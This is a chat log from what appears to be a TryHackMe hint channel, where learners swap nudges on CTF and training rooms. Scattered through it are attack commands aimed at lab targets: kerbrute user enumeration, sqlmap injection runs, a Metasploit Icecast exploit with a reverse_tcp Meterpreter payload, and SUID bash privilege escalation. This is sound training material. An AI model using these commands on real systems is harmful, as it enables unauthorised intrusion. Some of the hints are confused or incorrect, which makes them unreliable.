#room-hints

Also try watching any Ippsec video 🙂

ok

In the owasp top 10 room on task 19, I'm having trouble finding the default login and password hidden in the webapps source code

Have you found the source code?

Hint: not view source.

the links to the javascript and css in the source?

View source gives you the client side code. That's not what you're interested in.

Ok. You buy a new computer, let's say. You turn it on and it's asking for a password. What do you do?

check the documentation for a password

Probably by typing "computer model default password" in to google, right?

Faster than reading the manual for sure.

found it on github

thank you

You're welcome

Need a hint for the pickle Rick CTF room..

Found a ssh port and web port...on port 80 ..found some gifs and JPEGs in one directory....finally left with a username and some text in robots.txt..which doesn't make any sense... trying to do some steg on those gifs and jpegs ...but nothing found out yet .

You already have a username, and another "word" found in robots.txt, why not try using DirBuster or Gobuster to find where to use that information?.

Already did it...with gobuster

Just found a assests dir ..and nothing useful inthere...

Keep enumerating, try other wordlists and you will find what you are looking for.

Actually I have a quesn... dirbursting can find login pages??

Yaa..will do it

DirBuster or Gobuster are tools to find directory or file names (among other options) on web servers by brute force. They always depend on the wordlist you are using.

Ok

hints on vulnet internal?

which service to enumarate for second flag

Hey, I'm doing the Attacktive directory room, enumerating users on kerberos. I'm running this command: ./kerbrute_linux_amd64 userenum --dc spookysec.local -d spookysec.local userlist.txt -t 100 but it goes through the whole list without matching a username, is the command missing something?

Nvm, figured it out.

kinda lost on the owasp top 10 room task 29. Is this the correct exploit I should be looking for? ||https://www.exploit-db.com/exploits/49314||

Network Services 2: Tak 10 — Exploiting MySQL:

How in the Hell do I find this?

@iron hedge Try looking for an RCE 🙂

@light tundra This one's a sub box so might be worth asking in sub room. Otherwise from your description try using the find command to search for the MYSQL.txt file. (There's a room on that if needed.)

@hearty widget on my machine or the target

@light tundra My assumption is you're looking for the MYSQL.txt file so you will need to do that on the target machine.

okay thank you

I'm at the 2nd level of https://tryhackme.com/room/reloaded, but when I try to save a patch with SavePatch.py and try to run the exe on windows, it gives an error

should be #room-help but I'd still appreciate the help :)

Investigating Windows 3.x
Question 27 : What is the full registry path that was queried by the attacker to get information about the victim?

Could anyone help me on this please ? I browsed through logs for hours, tried countless filters, followed the hint, I can't find it.

@rustic surge What's the error?

"Incorrectly installed the file"

or something in that direction

Sorry read your message wrong, figured it was an error from the python script. now i reread it's for the file. Not done this one, sorry.

Task 3 on the OWASP juice shop doesn't at all tell me what it is looking for in the answer boxes

@iron hedge Question 1 or 2?

Both, I've logged on as admin but I don't see anything that fits the answer format

If you follow the question steps you'll receive a popup answer at the top of the home page.

if you missed this and closed it you might need to restart the box.

I'' try that

worked this time

Hi, I'm in battery room, so far I've collected an ||ELF binary where I think it's the admin password but wasn't unable to find it|| and I've found ||/admin.php|| which I think it could be vulnerable ||to sqli|| but not that sure. Any possible hint, please?

I'm having difficulty at room network services task enumerating SMB

What ip should i scan?

nvm

You should check "in more depth" that ||binary||, and read about ||SQL truncation attack|| or ||Null byte injection||. Note that there are several ways to bypass that part.

Hey all, having a wee issue with a question in network fundamentals 2. trying to run ./bash -p and its throwing:

cappucino@polonfs:~/.ssh$ ./bash -p
./bash: line 7: syntax error near unexpected token newline' ./bash: line 7: <!DOCTYPE html>'

any ideas>

That looks suspiciously like you downloaded the webpage rather than the binary

Based on the fact it's HTML

that would make sense! thought I was being smart using my new wget command 🙄

am I best off just going to the webpage and downloading it manually and cping it over

okay, got the proper file in there now and it does not throw errors now, but still outputs nothing... any ideas?

If it's from github, you need to grab the raw link

Check the permissions and importantly the owner

Owner needs to be root

But it likely doesn't have the right permissions

Permissions need suid

And what James said

currently sitting at: -rwsr-sr-x 1 cappucino cappucino 1113504

Owner's not right

Rest is ok

ah okay doaks. must have messed something up on the way here. Ill start afresh as I have no idea how to change the owner!

thanks chaps

That's a google able question ;)

ohoho, I gave "sudo chown root bash" a wee go but still no dice 😂 back to the drawing board

Look up the man page

Yep

You'll need to do it locally though

Then you modified it so it lost suid

Not on the target VM, also that

aw fantastic chaps. got it now, order is put file where you want it > set owner > set SUID

cheers guys!

Or do it all as root which is bad practice

bad practise? none of that here 👀

Hi all, looking for a tip for Daily Bugle room. I'm running sqlmap again the DB and sqlmap reads, "sting for SQL injection on GET parameter 'list[fullordering]'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y" I selected yes, but was that correct or would MariaDB(saw that in the nmap scans) benefit from those additional payloads?

Try to hit "enter" rather than typing "yes" as it'll just obey what you want. So pressing enter, it'll ignore the prompt and move on. If I'm am not mistaken.

Thanks, do you remember how long that scan took for you?

I know it's dependent upon hardware and environment, but generally?

Errr, I did notice the time but am not sure to be honest. But, it depends on the connection speed (as in my case, net connection speed was slow and it was taking much time)

Yea, I'm being impatient for sure.

were you able to run the joomblah.py script?

Haven't heard this script's name before

It doesn't quite ignore the prompt, it just goes with the default for that prompt i.e. The capitalised option. In this particular example: Y

Pressing enter seemed to kill the process for some reason

I'll go with the capitalized options

Not really. It just works fine while ignoring what it ask us. For eg "Do you want to skip test payloads specific for other DBMSes? [Y/n]", pressing enter will ignore what it had ask. I can also be wrong for sure

I am doing the "investigating windows 3.0" room but question 17 does not seem to accept my answer even though I am quite sure it is correct. Anyone done this room recently and could check my answer?

Hi I'm trying to complete the Osquery room but am stuck at Task 9 Windows and Osquery at question What is the schema for win_event_log_data?.

I've found the "source" for the query but I'm stuck at how to "translate" this into a query. I've tried https://uncoder.io/ but so far no luck.

Does anybody now where I could look in order to complete this question?
Any help would be appreciated 😄

Were you able to find a solution? I too am stuck at this. And no solution has been provided in the previous discussions. 🤔

Ignore the above. It worked after I restarted the target machine. Dunno why it didn't work the first time.

Sorry, was looking elsewhere but good to see you got it 😄

@gusty kite I can check, you can dm me

Hello!
Unable to access tryhackme machine

Permission denied, please try again.

Question on Daily Bugle and sqlmap. When I run sqlmap -u sqlmap -u "http://10.10.56.37/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --tables -D joomla I get a list of the tables in a format that appears like ##tableName, when I try dumping the tables using that format sqlmap say it needs a table name, I'm guessing the ## is commenting it out. So I try without the ##__ and still get an error. I ran the py script and received a table name different then this format. sqlmap gave ##_Users and joomblah.py gave fb9j5_users which I'm able to run sqlmap against. Why the discrepancy, what am I missing?

sp0rkt the table name in my notes is #__users

and for the sqlmap use -T '#__users'

Thanks, let me double check my dump. I

Yea, weird, I still can't pull it using '#_users', but using fb9j5_users I can.

the fb9j5_users can from joomblah and the #_users came from sqlamp

unless the other table is in another DB, but I'm fairy certain it was the joomla DB

Common Linux Privesc: task 6 - openssl passwd -1 -salt ["new"] ["123"]

the command is correct, though answer is not coming up correct?

Remove the quotes and square brackets.

thankyou

Check out task 3. There's an example query that does just what you need and shows you the format you should get for the answer. All you need to do is change the name of the table.

In Networking Services: Task 4, how do i open the files that are in the directory or preview them in the console? I've tried cat, curl, and just "open" lol

and nano. But none of the commands are found

hello, i'm trying to complete task 4 in networking services, i was able to use smbclient to get into the share but i cannot open the text file

@frank wasp Are you referring to the smb.txt flag?

you might have to download it to your machine and then open it

i’m referring to the part where you’ve just connected to the share via smbclient and there’s a .txt file you need to read the contents of

Anyone got a nudge regarding the privilege escalation in the couch room?

@frank wasp If you mean "Working From Home Information.txt", then the command is more.

syntax: more "filename"

i tried that and it was giving me a blank file, does it have to be in quotes?

@frank wasp yes

ah that must’ve been it, thanks!

Gave +1 Rep to @twilit mauve

^ currently got a shell as atena and couchdb

@nop I too am stuck in privilege escalation part of couch. Please let me know if you find something. Tried kernel exploit, not working

same here

same here

someone have already done the Couch vm?

because i'm stucked in the privesc

history whale mnt

same stuck on the same part, this exploit has to be new to me xD

got user in 45, stuck on priv for a few hours

same, flew through whole lab, found the user password after already popping a reverse shell

while listing files in term xD

stuck on last part

docker related for sure

there is actually kernel exploit that work

Nice, dont think thats the intended way though haha

ik, got stuck on docker

but it was fun room

just finished it

congrats

hi, i'm playing the couch room and i already rooted the room but i can't find the root flag

rooted without finding the root flag?😛

yeah 🙃

any hint where the root flag ??

all i can say is you dont have to think too much,thats the most easy part with this room 😆

oh so the root flag was hidden intentionally, I thought that was a bug that's why i asked

I am unable to found credentials in the web administration tool on the couch

google is your best friend

there are no writeup on couch

google on how to administer couchdb through browser

If you found the port where something is waiting for you, read their official documentation.

Was it actually docker related like you thought? (I'm stuck on the privesc)

Also still looking for a way (the kernel exploit i tried didn't work)

i got root but searching for the flag

Mind giving me a hint on how you proceeded?

If you already got access to the administration toolkit just take a look around the DBs and tables

It's always good to check if the file where the history of commands executed on the system is stored has valuable information...

Hi there....if someone could hint me on how to proceed with task 5 for room Sakura...I would appreciate it...it seems that the user does not exist on twitter and hence I am unable to proceed

The find command is your best friend in finding that flag.

Haha, couch was one trippy room😂😂

thanks man

Gave +1 Rep to @brave vale

Search for text rather than users

Same here, the PrivEsc part is really shady xD

It was staring me in the face the whole time...
Thanks for the nudge, I finished〜！

Gave +1 Rep to @brave vale

Many thanks...didn`t think it was that easy, if you look where you need to look.

It suddenly came sometime back...not sure man what happened

The Linux Fundamentals Room, where different switches for find command are explained is gold for this part.

Hey! Doing couch room! Any hint for getting root

Yeah i know, i should've been more patient until it got me back with the results

thanks i just found the root flag

Gave +1 Rep to @lost snow

Hint is the user directory

Bash history might contain some information

Is docker the way to get root?

Anybody completed the room couch?

yes

room-couch
que-6
can't figure it out

You will find the answer in the official documentation, take a look at the API reference.

thnx

👍

hey guys am on bookstore box, am stuck on the privesc any hints ?

Ulrich Boltaz:
Anyone completed kiba room

I need help on gaining shell

Anyone completed linux fundamentals 3?

best to ask, room task

Just ask your question directly

I'm stuck on Networking Services 2 Task 3. When I try use SSH to log in as the user "ubuntu" it says Connection Closed

I don't get why it closes the connection

are you sure the user is correct

ermm

well i tried changing it to root

it doesn't say connection closed anymore

you found the user earlier in the room

but it asks for a password, even though i've supplied the id_rsa

if it wants a pass, the id_rsa is not associated to that user

ohh

I think i know where i've gone wrong

hang on lemme try something lol

Thank you 🙂

Gave +1 Rep to @glacial gust

np

What'ss the technical term for a connection successfully established in Session OSI model?

session(s)?

I did my first write up , If someone want to check there it's a link

https://ekimik.medium.com/jack-of-all-trades-tryhackme-1dcadaac36eb

nice try

Hello guys, I am doing the Common Linux Privesc room and have a question about task 4. It is about the LinEnum script. Can i answer the questions only with the output of the script or do i need to research myself?

There are other ways to get those answers but you can also use LinEnum just try increasing the level to 1 with -l

Thank you very very much!! 😁

Gave +1 Rep to @candid nimbus

Is anybody else having application error trying to access the OWASP juice shop website?
https://imgur.com/a/w6QEv6G

oh well look at that, while typing up a couple of questions to some friends about it - OWASP juice shop webpage starts working yay!

Hello guys I'm kindda stuck with last question of Splunk2 room. I need to find a single webpage contacted by schedule tasks. Any hints please ?

Hi all, in brainstorm room which I know its a bof room BUT as nmap stated 3389 open i decided to check out the bluekeep exploit and it worked a treat. nmap to root.txt in 10 mins. just wondering, is this common or quite rare ?

It's not a race, do the room again by exploiting the Stack Buffer Overflow (which I think is the intentional path of doing the room) to practice, I think that's what matters, practice and incorporating new knowledge.

Cant agree more, I only started BOF´s this week. I suppose I still got "attack the ports" mentality from previous weeks learning. thanks

Gave +1 Rep to @brave vale

You can also report it in the #room-bugs channel, surely there will be someone who can tell you if it is intentional or not. I recommend the Buffer Overflow Prep room (https://www.tryhackme.com/room/bufferoverflowprep), I started it a few days ago and complementing that room with other sources you will learn a lot.

yeah, done that room already. cheers tho

Hello guys!

Please I need help pertaining to setting up my metasploit.

After launching the msfconsole, running the command to check the database status "db_status" shows that "postgresql is selected, no connection"..

Please help on how to connect it, I've done tons of research, all to no avail..

PS: I'm a beginner

do you have a postgre database running?

Omg, your question helped!

Running systemctl, I discovered postgresql service has stopped, so I started it and trying "db_status" command on msf again, I got "connected to msf"

But I've done all these some couple of days ago, I don't know why it worked:sweat_smile:

the whole "no connection" is a good hint, tbf

Exactly but I did this same thing some days ago and didn't work😩

Working now is a mystery but hey who cares? So far it works..

Thanks man!

Gave +1 Rep to @ripe hedge

I am completing the Linux fundamental part 3 room and in task 6 ( maintaining your system: automation).
And the ques is
When will the crontab on the deployed instance run ?

But there's no entry.
And answer length is 7 .
Please help me here

@wide ocean @ 6 stars 🙂

@wide ocean Look at the processes.sh line. 🙂

@hearty widget can you please elaborate the syntax.

I've already basically given you the answer. you just have to read it

you know where crontabs are yes

check my comments in the DM

and how to read them

There are no process and lines on the crontab.

What command are you using to open crontab?

there should be one, read the task carefully

AFAIR it's not in /etc

Ok I'll recheck

@wide ocean did you "crontab -e"?

Yes it's mentioned in the task only I did that.

Once that opens you have only one line not commented (commented lines are the ones with # at the start)

should be in there, only it's not the typical syntax

Got it.
I restarted the Machine several times and there's nothing before.

I am on level 13 I know the commands and all.

Btw thanks for the time and help

Is this what you have?

Yup got rt now

ah super.

I've followed the steps in the walkthrough but exploit failed and msf is not creating a session for the attack, please help

make sure your options are setup correctly?

Seems like it cant reach the IP set

Make sure the box is still online, try to ping it etc

after trying several times, I got a completed exploit but no session was created...

Running the sessions command shows "no active sessions"

If I'm not wrong then it's a ice room. Will you show the options?

db_nmap -sV IP address

use 5 (number for exploit/multi/handler)

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST MY_THM_IP_ADDR

use icecast

set RHOSTS DEPLOYED_MACHINE_IP

exploit

Screenshot, please

Don't use exploit/multi/handler

Only use icecast_header exploit

Ohhh.
Let me try that out...
I will try to send the screenshots

You are a hero man, it worked!

Thanks buddy!

Gave +1 Rep to @spice shard

hey guys

i have a problem with entiring network

last task of pre security

can someone help me

with sending tcp packets to computer 3

anyone here

in spite of router it doesnt set on his local host

yeahhh???

plsss

last question

i need help

Basic Malware RE it says u don't need to use any disassmbler. so I extracted it with simple 7zip. file and i got a file .rdata which is the key. I opened it with xxd still i can't get anything clear what to do

@upper mulch Which room? which task?

how can someone see the flag without decompiler..??????

@sturdy shadow Not done the room but you can either check the write up or imo just use ghidra.

that's right ghidra will work. But it says don't use any debugger

@sturdy shadow scrap that, just had a look. If i'm reading it right you should be able to strings the file and you'll get the information you need.

I saw strings and lots of strings.. And something which i 90% sure useful but i can't see what..

<EC>^B^@^@<EC>^B^@^@^@^@^@^Y^AExitProcess^@KERNEL32.dll^@^@H^Ememset^@^@F^Ememcp
y^@^@L^Esprintf^@ntdll.dll^@^N^BMessageBoxA^@USER32.dll^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@<9E>^P<E2>Z^@^@^@^@<E6><EC>^B^@^A^@^@^@^K^@^@^@^K^@^@^@x<EC>^B^@<A4><EC>^B^@<D0><EC>^B^@p^_^@^@<F0>^^^@^@P^^^@^@<F0> ^@^@<90>^_^@^@^@^P^@^@<E0>^_^@^@<F0>!^@^@0"^@^@<90>"^@^@<A0>!^@^@<F5><EC>^B^@^D<ED>^B^@
^^<ED>^B^@8<ED>^B^@K<ED>^B^@]<ED>^B^@|<ED>^B^@<94><ED>^B^@<B4><ED>^B^@<D3><ED>^B^@<E9><ED>^B^@^@^@^A^@^B^@^C^@^D^@^E^@^F^@^G^@^H^@   ^@
^@plaintext1.exe^@??0MD5@@QAE@XZ^@?Decode@MD5@@CAXPAKPAEI@Z^@?Encode@MD5@@CAXPAEPAKI@Z^@?Final@MD5@@QAEXXZ^@?Init@MD5@@QAEXXZ^@?MD5Transform@MD5@@CAXQAKQAE@Z^@?Update@MD5@@QAEXPAEI@Z^@?digestMemory@MD5@@QAEPADPAEH@Z^@?digestString@MD5@@QAEPADPAD@Z^@?md5_hash@@YAPADPAD@Z^@?writeToString@MD5@@QAEXXZ^@

ghidra is last option

Sorry. I've just opened the task for myself. Ignore my previous comments. So it seems you can't use ghidra but you can use code analysis tools (IDA, Codebrowser)

Actually tbh, i don't think it matters. I think the point it do find the details manually regardless of tool. Sorry not very helpful here lol.

Nope no issue. Thanks

Gave +1 Rep to @hearty widget

where this rep goes?

I saw it somewhere, let me check and confirm.

Can't remember, think there's just a leader board somewhere though.

yeah entering network but there was an issue but its fixed hopeflly

I m doing mindgames room any hint for getting root??

Hi guys! This is Cross-Site Scripting Room (XSS-Key Logger)
• I'm trying to understand further about XSS' Key-logger, can someone let me know why should I change the "console.log(1);" and how do I tell what should I change?

Good luck

Also gtfobins may help

Please why is meterpreter session dieing Everytime? Who's Killing it😭

I already got into the remote machine but after few seconds, it dies.
Any reason why this happens??

Please elaborate which room you're doing, which exploit, payload you're using. Provide screenshots.

I m not able to get root any hint how can I get

Linpeas should flag an interesting binary

Yeah I got that one openssl

I tried looking for it in GTFO bins

Haven't got anything special I can't find any other way

Gtfobins has an entry with an unusual attack vector

Especially for the capabilities that the binary has

You'll have to do a bit of research to figure out how it works though

Okay let me see

But once you figure it out the actual exploitation is fairly straightforward

i am still hving a problem with the task

di u get a resolution

Does anybody able to help me with this?

basically its saying you can make it write to your domain instead of just the console I believe

I suppose it's my own domain with my ideal location I want the record to be right?

yeah

I am having trouble with this question, "Find all files with write permission for the group "others", regardless of any other permissions, with extension ".sh" (use symbolic format)?" where can I learn how to use the symbolic format?

I think I know the room you are doing, doesn't it talk about symbolic format?

https://linuxize.com/post/chmod-command-in-linux/

theres a section in that with symbolic format notes

Got you, thanks man!

Gave +1 Rep to @toxic shoal

Hi everyone !

I'm currently stucked in the Windows fondamentals pt2.

Dont understant the question about msconfig : "Whom is the Windows licence registered to " ?

Understand* sorry

It about the Windows services field

It's a complex questions it takes me ages to solve..

Actually it's a silly questions in my opinion.. think about it.

I don't find any services which matches with thé answer

If u purchased something like a product. Then my question is who purchased this product.

So answer is I purchased this product..

the * sorry

Wow thank you @sturdy shadow

Gave +1 Rep to @sturdy shadow

Nope

I've subscribed

I was thinking that is was a foggy question

Hahaha

I've tried more than 4 hours une the services filed

Field

Of msconfig

I don't understand the relation between msconfig and this question

Yup

Thanks a lot

Extending Your Network -- I tried to response to arp request but it doesn't show on the network log, data: computer2 from computer2 to computer1.

Is it suppose to do that, or I'm wrong somewhere?

computer 1 to computer 3 -- that or the vice versa I can't recall which way around from the top of my head (:

It also needs to be a tcp packet

Yeah it's computer 1 to computer 3 - when I do that, it keeps saying "ARP REQUEST: Who has router tell computer1"

You do not receive the pop-up message with the flag?

Not really

In Data write Hi or whatever you like.

Same thing 😦

Try to do it from the following URL https://static-labs.tryhackme.cloud/sites/net-simulator/?config=introtonetworking

Remember to write something in Data.

FINALLY, thank you so much

okay....webenumv2....the nikto practical, last question about the jboss cookie...

I've played with outputs and displays and there is no mention of cookies

either what am I looking for or what am I supposed to be entering into the cli that would bring it up?

so far I've done nikto -h IP -Display 2 -Output V

I recently completed solving Binex THM room, and while solving that room, I found this ....

Photo from Soumyani1

I'm not sure, but according to my knowledge for finding offset, do we not have to copy the RSP register value, rather than RBP...???

Please correct me if I'm wrong ❤️🙏...

Windows Fundamentals 1, Task 3:

I don't know why this question is baffling me. I can't find what the answer looking where it should be on the VM.

It is literally the one question I have to complete the Pre-Security path lol

What's the square-ish thingy called? I should ask: Where does it take you?

thx much

Gave +1 Rep to @brave vale

To the ||notification center||?

You got half of it. I think I went in to customize the notification area and found the correct option there if i'm not mistaken

hmmm

okay

I'll look around. Thank you

Gave +1 Rep to @undone quail

no problem

@undone quail any idea what would work on the nikto question I asked earlier? the one to find cookies?

that was not the half I thought I had correct lol

So you found it?

yep 🙂

Awesome

Im looking for a hint on Pickle Rick. I have gotten the first two but have been stuck on the last one for some time. Any help? EDIT: Got it, nvm. Totally overthinking it

Nmap room: i think I got the wrong attack machine ip... is the attack machine the iplisted at the top of the screen?

Its the part titled "Active Machine Information"

The green ip address at the very top is yours.

🤦‍♂️

Thank you

Gave +1 Rep to @river musk

Hi guys, I'm doing the owasp top 10 room and I'm stuck on the part where we've to find non-root/non-service/non-daemon user count
I know I need to examine the etc/passwd file but I need help with how to proceed with that

User has uid >= 1000 (:

Be careful with that in other scenarios, in my Mac my default user has a UID of 501.

Okayy, thankyou for letting me know. TIL something new. Thankyou @brave vale

There is a executable.exe file in user/share file in victim machine accessible via SMB, how can i transfer that to my kali machine?

Using get command

Hey I m doing susta room! Any hint for getting in? Like I have just started and I can't figure out what can I do

Try to "guess" the correct number, if you encounter something that prevents you from doing so, you can search for information on how to bypass rate limits.

Thank you.

Gave +1 Rep to @spice shard

Hey, got a quick question on the Zero Logon room, task 4. I've run the zero logon exploit, and now I'm trying to run the secretsdump.py script and getting connection errors for port 445 (which didn't show open on a nmap scan). Any hints to set me in the right direction with this one?

nvm, i was using the cmd wrong

Hey anyone help me to the first step of disk analysis and autopsy

Plz help

im doing the linux fund, what is the password for the ssh

I cant find it for the life of me dude

and I aint using the browser

Hey all! I'm going through the HackPark room and have a problem with the hydra command. The way it is shown in the text doesn't seem to work. I've adjusted the command so that it worked, but it slowed down the machine to about 5 req/minute... anybody able to help out?

Can someone help me getting root privileges with apache2 without a shell escape sequence?

tryhackme

I have done it, you can dm me if you want

linux fund3 - task8 - the user I ssh'ed with has no privileges to read the apache log file. Is this on purpose?
Edit: Nvm, I see what you guys did there -.-

How websites work - task 5: "View the website on this task and inject HTML so that a malicious link to http://hacker.com/ is shown."
I don't understand how see the source code of the website. In the task 4, there was a direct link to see the source code but there is nothing there.

you can see the sourcecode with f12 on your keebord or do right click and click Visit sourcecode

but i can see all the source code of THM

give me a sec

have you tried to look only for the Frame Source code?

how to look it ?

It's german do not wonder

But if i am right informed you do not need this for Task 5

I need to be able to add something to the code, but this is not possible

nope

I have searched and searched, but I really don't understand

there is a field where you can enter Code.

Try inserting some HTML code

\o/

thank you !

keep it up😄

No Rep sad face

💪

oh no, don't be sad

I'm doing "Windows Fundamentals 1" could I get a hint for Task 3, Question 3: Besides Clock, Volume, and Network, what other icon is visible in the Notification Area?

Anyone?

look closer at the messagebox on the right

Sorry to ask again, but I am stumped as to what icon is missing, like all the icons in the question are the only icons there!

I'm doing "Windows Fundamentals 1" could I get a hint for Task 3, Question 3: Besides Clock, Volume, and Network, what other icon is visible in the Notification Area?

Without giving it away this is the best way I can think of to describe it- you are looking right at it, perhaps figure out the name for every icon you see

There are some links to MS documentation in the lesson, take a look

can someone give me a hint on extending your network task3 of networking nerd????

Already done it now.

Which question?

anyoneknow, What is each section of an IP address called?

O##et

is that answe for ip?

pardon, which room?

new room

in pre security

what is networking?

?

the room, what is networking, right?

yea

this is enogh hint

not correct

replace the ##

i giving you a clue

ok

Read the text task again, the answer is there.

oh

i think it's bytes

lol

What layers of the OSI model do firewalls operate at?

could you please help me

I am trying to solve this but not passing at all

Lookimg for some help on how websites work and what I'm looking for on the java script in pre securty

I found what I belive to be the credentials but not working

The correct answer is commented out in the javascript on the page in question, is that the one you tried?

Will dm you

The answer is in the section about IP addresses, be sure the spelling and plurality is correct.

i dont need helm more i just wrong writet the answere m,y fault xd

I'm in the Upload Vulnerability Challenge. I can upload and find a file to the server. I have a reverse shell for the NodeJS framework, but activating it in the admin page only leads to "Module does not exist" instead of a reverse shell to my nc listener.
Any ideas?

I am having troubles with answer format in Linux Fundamentals Part 3

Is that the whole output of cat /etc/crontab? because it seems like there is something missing

Yep, that's litterally it

Try using just:

crontab -l

(I think it is)

yep, I tried this, nothing interesting here

hi, im doing Linux strength training room V2, just curious, why did kali read scp username@ipaddress:/path to directory/'system AB'/ab as /path to directory/system and /path to directory/AB? Any idea how to solve this?

Very bottom line. You're not looking for a time. You're looking for a system event in this case

I am dumb, I've put it before without @

Thanks a lot

in case its hard to understand. here it is

You need to put the whole path in quotes:

"/home/sarah/system AB/db/ww.mnf"

I did but it still does the same thing

or must i use double quote? that shouldnt matter right?

I think it might matter. I tend to use doubles all the time

Tried it. turns out to be the the same. doesnt work either

Is it giving you the exact same error message?

yeah

What is each section of an IP address called?

read the room again

thats the biggest hint

it should be in the description

and try to understand what you are reading

I can't find it

.

I did

read it again

@midnight anchorI wanna rage now

I can't even find #3 too

be patient, hacking requires patience

dont hunt answers

try to learn something new

Done

How do you write IP address? @amber wagon

yay

Octet >

Its ez you don't know ?

1,2 seems like acending

yeah, it is accending

I am trying to help you (:

How many sections (in digits) does an IP address have?

Its 0-255

but didn't worked

also I did 250

didn't worked @midnight anchor

they are asking "how many sections"

not how many in one section

@amber wagon this is why I asked you this question

How many sections (in digits) does an IP address have?

Oof

I got it broo

Its too simple if you understand

yeah thats what i ve been trying to tell you

Is this research question, or am I missing something

thx

Gave +1 Rep to @midnight anchor

thx

lol ?

i researched it when i did the room but thinking about it its quite logical

It is 7 and 4 as for me, but that doesnt seem to work

Deploy the interactive lab using the "View Site" button and spoof your MAC address to access the site. What is the flag?

How do I do it

I did request website

Is at least one correct?

its not 7 and 4, research it

But got no hint or anything

How to make your device appear as another?

yay I did it

Good hint!

got it. Thanks

@midnight anchor am stuck

What is the syntax to ping 10.10.10.10?

he is refering to the command

think it logically

ok lemme try

@midnight anchor I can't

search it on google

What is syntax

Syntax = format. So it's basically asking you how would you ping that IP address

I rage hacking I will learn graphic designing

I'm doing the OWASP top 10 room task 5, and I'm so clueless as to what I should put in this box to find what it wants me to find

it asks what the user's shell is set as, is that like it's home directory?

I thought it was "/usr/sbin/apache2" but apparently not

fits the answer's formatting perfectly

Have a read of this

https://www.ibm.com/docs/en/aix/7.1?topic=passwords-using-etcpasswd-file

ohh yes the etc passwd file

cat'd the passwd file and grepped the username and found it

thanks 😄

No problem

In NMAP's room, there's a question that's troubling me!

Does the target (MACHINE_IP)respond to ICMP (ping) requests (Y/N)? Unable to understand what's the target ip here?

It'll be the one of the machine you're running, at the top of the page

You need to deploy the machine in Task 1 to see it

Yes, this works. Thanks mate!

Gave +1 Rep to @forest moss

No probs 🙂

Hi I'm working on Network Services Task 4: Exploiting SMB. I'm unable to get it to work in the attack machine.
I got the first answer correct so I think my syntax is fine but I get the following error when I put it in the terminal
" WARNING: The "Syslog" option is deprecated, and Connection failed (Error NT_STATUS_HOST_UNREACHABLE)
thanks for any pointers.

okay. If I'm already stuck, I don't know how I'm going to make a career out of this lol:

OWASP Top 10: Command Injection Practical

Is it asking me to actually hack into the root directory using injection? Because I can't find any other way to navigate to it. and I'm unaware of any particular exploit we're to use

unless I need to figure out vulnerabilities myself, etc

Can't recall this one that well, but have you tried just injecting a command that shows you the contents of a directory?

like literally injecting a shell command?

Yeah, bear in mind it's not asking for the system root directory, but the website root directory

yes

I don't remember figuring out any vulnerabilities on that one, I thought it was just basically getting it run the commands and it would give you the answer. Sorry. Did it a few weeks back so a bit hazy on it

yeah it seems like it, I appreciate the help

I just need to go back and just practice or refresh more

I suppose a lot of this career is muscle memory

And taking lots of notes. I use Joplin to track all my stuff

I'm not great at keeping notes lol

S A M E and it bites me in the ass every day.

I started using Notion to take notes, especially during work engagements, and it's been fantastic.

in case you didn't get it, you can use pwd

oh sorry, i mean ls

lmao i was trying cd

for some reason

lol i did try that out a few times myself to see if i could move around but with no success

so it seems...most things work

oh

that's the point, dummy hahahaa

OWASP Top 10.
What does this question asks from me?

I've already changed HTML in later task

What exactly should I override to get this flag?

@gloomy nebula it’s been a little bit since I’ve done that room but I’m almost certain in each section they have examples that directly correlate to the questions asked. The first one you’re mostly inserting a stored xss, second you’re overwriting whatever element is being used to display “XSS Playground”

Anyone help to this problem

Room -linux privesc

Somebody please give me a hint on finding the last flag on Eternalblue.

I'm thinking maybe I'm suppose to find a way and activate the Administrator account so to access the Admin folder but I'm lost..

Please give me a hint!:weary: :weary:

If you've followed all the question of blue room, then you are able to grab flag.

If you get a valid xss, you will see your flag popped up

Omg, will read all over again😭

It's is worth giving it a try, but harder this time (:

Thanks man.
On it!

Gave +1 Rep to @spice shard

Thanks buddy, it wasn't as hard as I thought😅
I was just complicating things for myself..

Got the flag, Thanks man!👍

Gave +1 Rep to @spice shard

Windows Fundamentals 2 [Help Required]

Can anyone give hint regarding "Command for Windows Troubleshooting"

Ye, got this, question is a bit misleading, I was meant to just insert some tags, like <b> in comment section. Not document.write as I did before.

You can open the Troubleshooting using control.exe and an argument

Maybe I'm not typing the answer in the correct format for the question about what layers of the OSI model do firewalls operate at. I can't seem to get it to like what I'm putting in so far.

The format is Layer X, Layer Y

Thanks, looks like I have more than just that as the issue. I must be missing something with my thought process

Gave +1 Rep to @rain latch

how do i go from one module to another in metasploit without quitting and then reloading metasploit...

Do you mean when u got a shell/session or simply after selecting a module?

after selecting a module

Simply with the use <Module> command

so if i wanted to search for another module: search mysql_hashdump - how would i access that when i am already in mysql_schemadump without quitting metasploit

hope that makes sense...

im currently doing the extending your network room

and im having to stop the attack on the website

what rules would be needed?

@vagrant dove does the screenshot help you?

oops

drop requests from an IP address

what ip would be best??#

the one that attacks

from the ip or to the ip?

from

you wont to disallow the IP to make requests to the server not disallow the server to send packets to the IP

what ip would i send the drop to?

if I remember correctly you have a kinda "interface" on your right side in that room where you can specify the information

im really confused

what configuration would i make?

Can anyone give a hint to getting foothold on blog room

read the text it shows you before the simulation starts, it will tell you which destination and what port the packets are being sent to, and from the flow you can deduct what ip you should block as the source

ok.

thanks ill try this

it worked thanks

thanks!#

Gave +1 Rep to @wooden mist

Is anyone having issues with the OSI practical game. It says to use the space bar to enter the door but nothing seems to work, I have tried using other keys along with the space bar and still nothing

I used the arrow up key I think

I have tried that, I have literally tried every key. I don't know if you have to use a combo of keys or it is just broken

i used left right then space too get in each door

That is the last flag I need to get the whole Pre cert

@raw parrot are you using the attack box or VPN from your machine?

hello i am stuck on one last question on dns in detail. im using the vm but i dont think its giving me the right info for the cname on the ns look up cmd

i can send screen shots if you want

That'd be helpful...

@rain latch message me and i can send you a print screen

Hello I wonder if I can get a hint so I'm at the beginner level at owasp where I should get the tomcat developer's name, and I tried to submit it for like 10 minutes now but it still not accepting it.

Research!! (:

think org not person

||omfg||

thx

I am currently working on upload vulnerabilities, and stuck on this task, because while using burp as proxy site completly refuses to load

All other sites work as intended tho, so this is something sketchy about this java.uploadvulns.thm

OWASP Top 10, Task 1: command Injection practical—

